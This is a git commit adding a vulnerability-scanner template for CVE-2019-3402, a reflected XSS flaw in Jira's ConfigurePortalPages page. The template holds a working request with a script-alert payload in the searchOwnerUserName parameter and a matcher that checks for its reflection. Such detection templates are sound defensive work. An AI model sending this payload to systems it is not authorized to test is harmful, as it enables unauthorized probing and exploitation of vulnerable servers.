Adding cve-2019-3402

patch-1
bauthard 2020-11-06 15:58:11 +05:30
parent 740f726208
commit cd90698cb5
1 changed files with 24 additions and 0 deletions

24
cves/CVE-2019-3402.yaml Normal file
View File

@ -0,0 +1,24 @@
id: cve-2019-3402
info:
name: Jira - Reflected XSS using searchOwnerUserName parameter.
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
# Source:- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
requests:
- method: GET
path:
- "{{BaseURL}}//secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1)</script>"
part: body